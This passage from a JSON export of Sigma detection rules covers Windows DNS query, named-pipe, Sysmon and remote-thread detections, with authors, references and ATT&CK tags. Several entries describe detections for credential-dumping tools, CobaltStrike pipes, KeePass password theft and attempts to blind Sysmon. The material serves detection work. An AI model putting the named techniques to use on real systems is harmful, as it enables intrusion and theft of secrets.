"https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml" ], "tags": [ "attack.collection", "attack.t1056" ] }, "related": [ { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df68f791-ad95-447f-a271-640a0dab9cf8", "value": "DNS Query Request To OneLaunch Update Service" }, { "description": "Detects DNS queries initiated by \"Regsvr32.exe\"", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_regsvr32_dns_query.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml" ], "tags": [ "attack.execution", "attack.t1559.001", "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", "value": "DNS Query Request By Regsvr32.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113, Connor Martin", "creation_date": "2022-07-11", "falsepositive": [ "Likely with other browser software. Apply additional filters for any other browsers you might use." ], "filename": "dns_query_win_remote_access_software_domains_non_browsers.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://blog.sekoia.io/scattered-spider-laying-new-eggs/", "https://redcanary.com/blog/misbehaving-rats/", "https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "value": "DNS Query To Remote Access Software Domain From Non-Browser App" }, { "description": "Detects the creation of a named pipe seen used by known APTs or malware.", "meta": { "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "creation_date": "2017-11-06", "falsepositive": [ "Unknown" ], "filename": "pipe_created_susp_malicious_namedpipes.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://www.us-cert.gov/ncas/alerts/TA17-117A", "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", "https://github.com/RiccardoAncarani/LiquidSnake", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "value": "Malicious Named Pipe Created" }, { "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", "meta": { "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Chrome instances using the exact same pipe name \"mojo.xxx\"", "Websense Endpoint using the pipe name \"DserNamePipe(R|W)\\d{1,5}\"" ], "filename": "pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "stp.1k" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "value": "CobaltStrike Named Pipe Patterns" }, { "description": "Detects default RemCom pipe creation", "meta": { "author": "Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Legitimate Administrator activity" ], "filename": "pipe_created_pua_remcom_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/kavika13/RemCom", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d36f87ea-c403-44d2-aa79-1a0ac7c24456", "value": "PUA - RemCom Default Named Pipe" }, { "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2021-10-08", "falsepositive": [ "Unknown" ], "filename": "pipe_created_adfs_namedpipe_connection_uncommon_tool.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/Azure/SimuLand", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://o365blog.com/post/adfs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "value": "ADFS Database Named Pipe Connection By Uncommon Tool" }, { "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_cobaltstrike_re.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "value": "CobaltStrike Named Pipe Pattern Regex" }, { "description": "Detects PAExec default named pipe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "pipe_created_pua_paexec_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", "https://github.com/poweradminllc/PAExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "value": "PUA - PAExec Default Named Pipe" }, { "description": "Detects default CSExec pipe creation", "meta": { "author": "Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Legitimate Administrator activity" ], "filename": "pipe_created_pua_csexec_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f318b911-ea88-43f4-9281-0de23ede628e", "value": "PUA - CSExec Default Named Pipe" }, { "description": "Detects the pattern of a pipe name as used by the hack tool CoercedPotato", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_coercedpotato.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://blog.hackvens.fr/articles/CoercedPotato.html", "https://github.com/hackvens/CoercedPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d0083b3-580b-40da-9bba-626c19fe4033", "value": "HackTool - CoercedPotato Named Pipe Creation" }, { "description": "Detects the pattern of a pipe name as used by the hack tool EfsPotato", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "\\pipe\\LOCAL\\Monitorian" ], "filename": "pipe_created_hktl_efspotato.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", "https://github.com/zcgonvh/EfsPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_efspotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "value": "HackTool - EfsPotato Named Pipe Creation" }, { "description": "Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unlikely" ], "filename": "pipe_created_hktl_diagtrack_eop.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", "value": "HackTool - DiagTrackEoP Default Named Pipe" }, { "description": "Detects creation of default named pipes used by the Koh tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-08", "falsepositive": [ "Unlikely" ], "filename": "pipe_created_hktl_koh_default_pipe.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1528", "attack.t1134.001" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "value": "HackTool - Koh Default Named Pipe" }, { "description": "Detects the creation of a named pipe as used by CobaltStrike", "meta": { "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "creation_date": "2021-05-25", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_cobaltstrike.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://twitter.com/d4rksystem/status/1357010969264873472", "https://github.com/SigmaHQ/sigma/issues/253", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "value": "CobaltStrike Named Pipe" }, { "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-09-12", "falsepositive": [ "Programs using PowerShell directly without invocation of a dedicated interpreter." ], "filename": "pipe_created_powershell_alternate_host_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "value": "Alternate PowerShell Hosts Pipe" }, { "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-04", "falsepositive": [ "Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment." ], "filename": "pipe_created_sysinternals_psexec_default_pipe_susp_location.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "value": "PsExec Tool Execution From Suspicious Locations - PipeName" }, { "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "pipe_created_scrcons_wmi_consumer_namedpipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml" ], "tags": [ "attack.t1047", "attack.execution" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "value": "WMI Event Consumer Created Named Pipe" }, { "description": "Detects well-known credential dumping tools execution via specific named pipe creation", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate Administrator using tool for password recovery" ], "filename": "pipe_created_hktl_generic_cred_dump_tools_pipes.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "value": "HackTool - Credential Dumping Tools Named Pipe Created" }, { "description": "Detects the execution of PowerShell via the creation of a named pipe starting with PSHost", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-09-12", "falsepositive": [ "Likely" ], "filename": "pipe_created_powershell_execution_pipe.yml", "level": "informational", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "value": "New PowerShell Instance Created" }, { "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", "meta": { "author": "frack113", "creation_date": "2021-06-04", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification_status.yml", "level": "high", "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", "value": "Sysmon Configuration Modification" }, { "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "value": "Sysmon Configuration Change" }, { "description": "Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.", "meta": { "author": "frack113", "creation_date": "2023-07-20", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_block_shredding.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_shredding.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c3e5c1b1-45e9-4632-b242-27939c170239", "value": "Sysmon Blocked File Shredding" }, { "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", "meta": { "author": "frack113", "creation_date": "2021-06-04", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification_error.yml", "level": "high", "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "value": "Sysmon Configuration Error" }, { "description": "Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.", "meta": { "author": "frack113", "creation_date": "2023-07-20", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_executable_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_executable_detected.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "693a44e9-7f26-4cb6-b787-214867672d3a", "value": "Sysmon File Executable Creation Detected" }, { "description": "Triggers on any Sysmon \"FileBlockExecutable\" event, which indicates a violation of the configured block policy", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-16", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_block_executable.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_executable.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", "value": "Sysmon Blocked Executable" }, { "description": "Detects uncommon processes creating remote threads.", "meta": { "author": "Perez Diego (@darkquassar), oscd.community", "creation_date": "2019-10-27", "falsepositive": [ "This rule is best put in testing first in order to create a baseline that reflects the data in your environment." ], "filename": "create_remote_thread_win_susp_uncommon_source_image.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io", "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", "value": "Remote Thread Creation By Uncommon Source Image" }, { "description": "Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity", "meta": { "author": "Timon Hackenjos", "creation_date": "2022-04-22", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_keepass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/denandz/KeeFarce", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/GhostPack/KeeThief", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml" ], "tags": [ "attack.credential-access", "attack.t1555.005" ] }, "related": [ { "dest-uuid": "315f51f0-6b03-4c1e-bfb2-84740afb8e21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "value": "Remote Thread Created In KeePass.EXE" }, { "description": "Detects remote thread creation in command shell applications, such as \"Cmd.EXE\" and \"PowerShell.EXE\".\nIt is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.\n", "meta": { "author": "Splunk Research Team", "creation_date": "2024-07-29", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_susp_target_shell_application.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/", "https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_target_shell_application.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9d4d3fa-8fc0-41bc-80b1-30b9fda79d6f", "value": "Remote Thread Created In Shell Application" }, { "description": "Detects the creation of a remote thread from a Powershell process in an uncommon target process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-25", "falsepositive": [ "Unknown" 